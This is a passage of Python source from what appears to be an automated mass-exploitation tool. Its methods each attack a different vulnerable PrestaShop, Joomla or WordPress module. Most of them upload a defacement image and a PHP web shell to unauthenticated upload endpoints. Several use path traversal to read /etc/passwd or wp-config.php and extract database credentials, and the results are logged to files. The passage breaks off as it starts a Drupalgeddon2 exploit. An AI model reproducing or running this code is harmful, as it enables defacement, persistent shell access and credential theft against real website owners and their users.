CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('advancedslider', site)
else:
self.Print_NotVuln('advancedslider', site)
except:
self.Print_NotVuln('advancedslider', site)
def cartabandonmentpro(self, site):
try:
Exp = site + '/modules/cartabandonmentpro/upload.php'
Checkvuln = requests.get('http://' + Exp, timeout=5)
FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
IndexPath = site + '/modules/cartabandonmentpro/uploads/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('cartabandonmentpro', site)
else:
self.Print_NotVuln('cartabandonmentpro', site)
except:
self.Print_NotVuln('cartabandonmentpro', site)
def cartabandonmentproOld(self, site):
try:
Exp = site + '/modules/cartabandonmentproOld/upload.php'
Checkvuln = requests.get('http://' + Exp, timeout=5)
FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('cartabandonmentproOld', site)
else:
self.Print_NotVuln('cartabandonmentproOld', site)
except:
self.Print_NotVuln('cartabandonmentproOld', site)
def videostab(self, site):
try:
Exp = site + '/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload'
Checkvuln = requests.get('http://' + Exp, timeout=5)
FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
IndexPath = site + '/modules/videostab/uploads/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('videostab', site)
else:
self.Print_NotVuln('videostab', site)
except:
self.Print_NotVuln('videostab', site)
def wg24themeadministration(self, site):
Exl = site + '/modules/wg24themeadministration/wg24_ajax.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
PostData = {'data': 'bajatax',
'type': 'pattern_upload'}
FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('wg24themeadministration', site)
else:
self.Print_NotVuln('wg24themeadministration', site)
except:
self.Print_NotVuln('wg24themeadministration', site)
def fieldvmegamenu(self, site):
Exl = site + '/modules/fieldvmegamenu/ajax/upload.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('fieldvmegamenu', site)
else:
self.Print_NotVuln('fieldvmegamenu', site)
except:
self.Print_NotVuln('fieldvmegamenu', site)
def wdoptionpanel(self, site):
Exl = site + '/modules/wdoptionpanel/wdoptionpanel_ajax.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
PostData = {'data': 'bajatax',
'type': 'image_upload'}
FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/wdoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/wdoptionpanel/upload/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('wdoptionpanel', site)
else:
self.Print_NotVuln('wdoptionpanel', site)
except:
self.Print_NotVuln('wdoptionpanel', site)
def pk_flexmenu(self, site):
Exl = site + '/modules/pk_flexmenu/ajax/upload.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/pk_flexmenu/uploads/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/pk_flexmenu/uploads/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('pk_flexmenu', site)
else:
self.Print_NotVuln('pk_flexmenu', site)
except:
self.Print_NotVuln('pk_flexmenu', site)
def nvn_export_orders(self, site):
Exl = site + '/modules/nvn_export_orders/upload.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/nvn_export_orders/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/nvn_export_orders/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('nvn_export_orders', site)
else:
self.Print_NotVuln('nvn_export_orders', site)
except:
self.Print_NotVuln('nvn_export_orders', site)
def megamenu(self, site):
try:
Exp = site + '/modules/megamenu/uploadify/uploadify.php?id=pwn'
Checkvuln = requests.get('http://' + Exp, timeout=5)
FileDataIndex = {'Filedata': open(self.Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
IndexPath = site + '/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('megamenu', site)
else:
self.Print_NotVuln('megamenu', site)
except:
self.Print_NotVuln('megamenu', site)
def tdpsthemeoptionpanel(self, site):
Exl = site + '/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/tdpsthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/tdpsthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('tdpsthemeoptionpanel', site)
else:
self.Print_NotVuln('tdpsthemeoptionpanel', site)
except:
self.Print_NotVuln('tdpsthemeoptionpanel', site)
def psmodthemeoptionpanel(self, site):
Exl = site + '/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/psmodthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/psmodthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('psmodthemeoptionpanel', site)
else:
self.Print_NotVuln('psmodthemeoptionpanel', site)
except:
self.Print_NotVuln('psmodthemeoptionpanel', site)
def lib(self, site):
Exl = site + '/modules/lib/redactor/file_upload.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'file': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'file': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/masseditproduct/uploads/file/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/masseditproduct/uploads/file/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('lib', site)
else:
self.Print_NotVuln('lib', site)
except:
self.Print_NotVuln('lib', site)
def Com_Jbcatalog(self, site):
Check = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php', timeout=10)
if Check.status_code == 200:
ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
files=ShellFile)
CheckShell = requests.get('http://' + site +
'/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php\n')
else:
ShellFile = {'files[]': open(self.Jce_Deface_image, 'rb')}
requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
files=ShellFile)
CheckIndex = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/'
'php/files/' + self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
+ self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
+ self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_Jbcatalog', site)
else:
self.Print_NotVuln('Com_Jbcatalog', site)
def Com_SexyContactform(self, site):
Check = requests.get('http://' + site + '/components/com_sexycontactform/fileupload/', timeout=10)
if Check.status_code == 200:
IndeX = {'files[]': open(self.Jce_Deface_image, 'rb')}
ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
requests.post('http://' + site + '/components/com_sexycontactform/fileupload/',
files=ShellFile, timeout=10)
CheckShell = requests.get('http://' + site +
'/components/com_sexycontactform/fileupload/files/up.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/components/com_sexycontactform/fileupload/files/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/components/com_sexycontactform/fileupload/files/up.php\n')
else:
requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
files=IndeX)
CheckIndex = requests.get('http://' + site + '/components/com_sexycontactform/fileupload/files/'
+ self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/components/com_sexycontactform/fileupload/files/'
+ self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/components/com_sexycontactform/fileupload/files/'
+ self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_SexyContactform', site)
else:
self.Print_NotVuln('Com_SexyContactform', site)
def Com_rokdownloads(self, site):
Check = requests.get('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
timeout=10)
if Check.status_code == 200 or Check.status_code == 500:
IndeX = {'files[]': open(self.Jce_Deface_image, 'rb')}
ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
Datapost = {'jpath': '../../../../'}
requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
files=ShellFile, data=Datapost, timeout=10)
CheckShell = requests.get('http://' + site +
'/images/stories/up.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/stories/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/stories/up.php\n')
else:
requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
files=IndeX, data=Datapost, timeout=10)
CheckIndex = requests.get('http://' + site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_rokdownloads', site)
else:
self.Print_NotVuln('Com_rokdownloads', site)
def wp_miniaudioplayer(self, site):
CheckVuln = requests.get('http://' + site, timeout=10)
if 'wp-miniaudioplayer' in CheckVuln.text.encode('utf-8'):
etc = requests.get('http://' + site +
'/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd', timeout=5)
if 'nologin' in etc.text.encode('utf-8'):
with open('result/Passwd_file.text', 'a') as writer:
writer.write('---------------------------\nSite: ' + site + '\n' + etc.text.encode('utf-8') + '\n')
self.Print_Vuln('wp-miniaudioplayer', site)
else:
self.Print_NotVuln('wp-miniaudioplayer', site)
else:
self.Print_NotVuln('wp-miniaudioplayer', site)
def wp_support_plus_responsive_ticket_system(self, site):
try:
Exp = 'http://' + site + \
'/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/' \
'downloadAttachment.php?path=../../../../../wp-config.php'
GetConfig = requests.get(Exp, timeout=5)
if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
else:
self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
except:
self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
def eshop_magic(self, site):
try:
Exp = 'http://' + site + \
'wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php'
GetConfig = requests.get(Exp, timeout=5)
if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
self.Print_NotVuln('eshop-magic', site)
else:
self.Print_NotVuln('eshop-magic', site)
except:
self.Print_NotVuln('eshop-magic', site)
def ungallery(self, site):
try:
Exp = 'http://' + site + \
'/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php'
GetConfig = requests.get(Exp, timeout=5)
if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
self.Print_NotVuln('ungallery', site)
else:
self.Print_NotVuln('ungallery', site)
except:
self.Print_NotVuln('ungallery', site)
def Com_extplorer(self, site):
Check = requests.get('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
timeout=10)
if Check.status_code == 200 or Check.status_code == 500:
IndeX = {'Filedata': open(self.Jce_Deface_image, 'rb')}
ShellFile = {'Filedata': open(self.ShellPresta, 'rb')}
requests.post('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
files=ShellFile, timeout=10)
CheckShell = requests.get('http://' + site +
'/images/stories/up.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/stories/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/stories/up.php\n')
else:
requests.post('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
files=IndeX, timeout=10)
CheckIndex = requests.get('http://' + site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_extplorer', site)
else:
self.Print_NotVuln('Com_extplorer', site)
def Com_jwallpapers_index(self, site):
try:
fileindex = {'file': open(self.Jce_Deface_image, 'rb')}
post_data = {"name": self.Jce_Deface_image.split('/')[1],
"submit": "Upload"}
Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '"jsonrpc"' in GoT.text.encode('utf-8'):
Check = requests.get('http://' + site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1], timeout=5)
if 'GIF89a' in Check.text.encode('utf-8'):
self.Print_Vuln_index(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_jwallpapers', site)
except:
self.Print_NotVuln('Com_jwallpapers', site)
def Com_jwallpapers_Shell(self, site):
try:
fileindex = {'file': open(self.indeX, 'rb')}
post_data = {"name": "vuln.php",
"submit": "Upload"}
Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '"jsonrpc"' in GoT.text.encode('utf-8'):
requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=5)
requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=5)
Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=5)
Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=5)
Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
if 'Vuln!!' in Check.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_jwallpapers_index(site)
elif 'Vuln!!' in Check2.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_jwallpapers_index(site)
elif 'Vuln!!' in Check3.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_jwallpapers_index(site)
else:
self.Com_jwallpapers_index(site)
except:
self.Com_jwallpapers_index(site)
def Com_facileforms(self, site):
Check = requests.get('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
timeout=10)
if Check.status_code == 200 or Check.status_code == 500:
IndeX = {'Filedata': open(self.Jce_Deface_image, 'rb')}
ShellFile = {'Filedata': open(self.ShellPresta, 'rb')}
Datapost = {'folder': '/components/com_facileforms/libraries/jquery/'}
requests.post('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
files=ShellFile, data=Datapost, timeout=10)
CheckShell = requests.get('http://' + site +
'/components/com_facileforms/libraries/jquery/up.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/components/com_facileforms/libraries/jquery/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/components/com_facileforms/libraries/jquery/up.php\n')
else:
requests.post('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
files=IndeX, data=Datapost, timeout=10)
CheckIndex = requests.get('http://' + site + '/components/com_facileforms/libraries/jquery/'
+ self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/components/com_facileforms/libraries/jquery/'
+ self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/components/com_facileforms/libraries/jquery/'
+ self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_facileforms', site)
else:
self.Print_NotVuln('Com_facileforms', site)
def barclaycart(self, site):
try:
ShellFile = {'Filedata': (self.pagelinesExploitShell, open(self.pagelinesExploitShell, 'rb')
, 'multipart/form-data')}
Exp = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/uploadify.php'
requests.post(Exp, files=ShellFile, timeout=5)
Shell = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/' \
+ self.pagelinesExploitShell.split('/')[1]
GoT = requests.get(Shell, timeout=5)
if GoT.status_code == 200:
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('barclaycart plugin', site)
else:
self.Print_NotVuln('barclaycart plugin', site)
except:
self.Print_NotVuln('barclaycart plugin', site)
class DrupalGedden2(object):
def __init__(self, site):
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
try:
CheckVersion = requests.get('http://' + site, timeout=5)
if 'content="Drupal 7' in CheckVersion.text.encode('utf-8'):
self.Version7Drupal(site)
elif 'content="Drupal 8' in CheckVersion.text.encode('utf-8'):
